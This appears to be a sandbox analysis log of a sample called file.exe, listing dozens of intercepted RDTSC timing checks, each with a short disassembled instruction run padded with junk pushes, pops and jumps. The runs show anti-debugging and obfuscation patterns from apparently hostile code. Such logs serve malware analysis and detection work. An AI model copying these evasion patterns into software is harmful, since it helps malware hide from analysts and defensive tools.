                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215516 second address: 121553F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5C21209546h 0x0000000a jmp 00007F5C21209550h 0x0000000f je 00007F5C21209546h 0x00000015 popad 0x00000016 je 00007F5C2120954Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121553F second address: 121554B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5C20C5AC42h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121554B second address: 1215551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12156B4 second address: 12156E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5C20C5AC3Ah 0x00000008 jmp 00007F5C20C5AC45h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F5C20C5AC36h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12156E3 second address: 12156ED instructions: 0x00000000 rdtsc 0x00000002 js 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215C42 second address: 1215C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121600F second address: 1216013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216013 second address: 1216074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC46h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F5C20C5AC3Eh 0x00000011 push edi 0x00000012 jmp 00007F5C20C5AC40h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pushad 0x0000001f popad 0x00000020 pop edi 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 jmp 00007F5C20C5AC48h 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121642D second address: 1216439 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5C21209546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216439 second address: 121645D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F5C20C5AC36h 0x0000000b pop edx 0x0000000c jbe 00007F5C20C5AC4Ch 0x00000012 jmp 00007F5C20C5AC40h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121525B second address: 121525F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121525F second address: 1215263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215263 second address: 1215269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9B3 second address: 121A9B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9B9 second address: 121A9CF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5C21209558h 0x00000008 jmp 00007F5C2120954Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9CF second address: 121A9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D7 second address: 121A9EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209553h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9EE second address: 121AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5C20C5AC48h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2AA second address: 121A2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5C2120954Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2BD second address: 121A2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2C3 second address: 121A2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2C7 second address: 121A2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F5C20C5AC3Ah 0x0000000f jmp 00007F5C20C5AC42h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2F0 second address: 121A2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2F4 second address: 121A2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A6EC second address: 121A70B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209558h 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A70B second address: 121A739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007F5C20C5AC49h 0x00000013 jno 00007F5C20C5AC36h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CE55 second address: 121CE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C2120954Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C945 second address: 121C961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5C20C5AC47h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220B9A second address: 1220B9F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220B9F second address: 1220BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220F8E second address: 1220F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220F94 second address: 1220FC8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5C20C5AC3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F5C20C5AC36h 0x00000017 jmp 00007F5C20C5AC44h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12212D4 second address: 12212D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12264E2 second address: 12264FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5C20C5AC36h 0x0000000a jmp 00007F5C20C5AC3Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226651 second address: 1226655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226655 second address: 122668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5C20C5AC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F5C20C5AC3Ah 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 pushad 0x00000018 jng 00007F5C20C5AC36h 0x0000001e jng 00007F5C20C5AC36h 0x00000024 jmp 00007F5C20C5AC3Eh 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12267ED second address: 1226803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F5C21209546h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226803 second address: 1226811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE216 second address: 11CE2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F5C21209557h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5C21209556h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F5C21209548h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jo 00007F5C21209549h 0x00000036 and ch, 0000007Ah 0x00000039 mov ebx, dword ptr [ebp+12483379h] 0x0000003f jnc 00007F5C2120954Ch 0x00000045 add eax, ebx 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F5C21209548h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Ah 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 xor dword ptr [ebp+122D1CE9h], edi 0x00000067 nop 0x00000068 jg 00007F5C21209558h 0x0000006e push eax 0x0000006f push eax 0x00000070 jbe 00007F5C2120954Ch 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227953 second address: 1227957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A9EC second address: 122A9FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F5C21209548h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A9FC second address: 122AA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C20C5AC43h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122A4CB second address: 122A4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1232000 second address: 1232004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230182 second address: 1230186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230186 second address: 12301A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F5C20C5AC41h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230470 second address: 123049D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F5C21209546h 0x0000000b pop edx 0x0000000c jng 00007F5C2120955Ah 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123049D second address: 12304C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 je 00007F5C20C5AC36h 0x0000000e jmp 00007F5C20C5AC44h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123138B second address: 1231391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231391 second address: 1231396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231396 second address: 12313A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5C2120954Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12313A7 second address: 12313B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C20C5AC36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123169B second address: 123169F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12382A1 second address: 12382A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12382A5 second address: 12382AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12375A6 second address: 12375AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12376DB second address: 12376E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237C61 second address: 1237C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jnc 00007F5C20C5AC36h 0x0000000c pop ebx 0x0000000d pop edi 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237DDE second address: 1237DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237DE2 second address: 1237DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237F68 second address: 1237F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C21209559h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237F85 second address: 1237F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CBC7 second address: 123CBCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1242B64 second address: 1242B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1242CAF second address: 1242CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5C21209556h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1242CCB second address: 1242CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243C8A second address: 1243CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F5C2120954Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jng 00007F5C21209546h 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jns 00007F5C21209546h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243CB9 second address: 1243CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243CBE second address: 1243CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5C21209546h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124CE8B second address: 124CE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F5C20C5AC36h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F5C20C5AC36h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C8CE second address: 124C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5C21209546h 0x0000000a je 00007F5C21209546h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C8E3 second address: 124C8E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C8E7 second address: 124C8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C8EF second address: 124C928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F5C20C5AC36h 0x00000014 pop esi 0x00000015 push edi 0x00000016 jbe 00007F5C20C5AC36h 0x0000001c jmp 00007F5C20C5AC45h 0x00000021 pop edi 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C928 second address: 124C932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5C21209546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C932 second address: 124C93C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C93C second address: 124C942 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1258C45 second address: 1258C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125CFC6 second address: 125CFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209552h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125CFE6 second address: 125CFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125CBE1 second address: 125CBE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125FA47 second address: 125FA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5C20C5AC36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1186253 second address: 118626C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209553h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118626C second address: 118627F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F5C20C5AC36h 0x0000000d je 00007F5C20C5AC36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118627F second address: 118629A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e js 00007F5C21209546h 0x00000014 jnl 00007F5C21209546h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F579 second address: 125F57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126118B second address: 126118F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F5FF second address: 126F618 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5C20C5AC38h 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F5C20C5AC3Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F49F second address: 126F4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126F4A5 second address: 126F4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1270C54 second address: 1270C5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276B0F second address: 1276B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276B13 second address: 1276B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5C21209546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F5C21209558h 0x00000013 pushad 0x00000014 jmp 00007F5C21209558h 0x00000019 jl 00007F5C21209546h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276B5A second address: 1276B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jc 00007F5C20C5AC36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
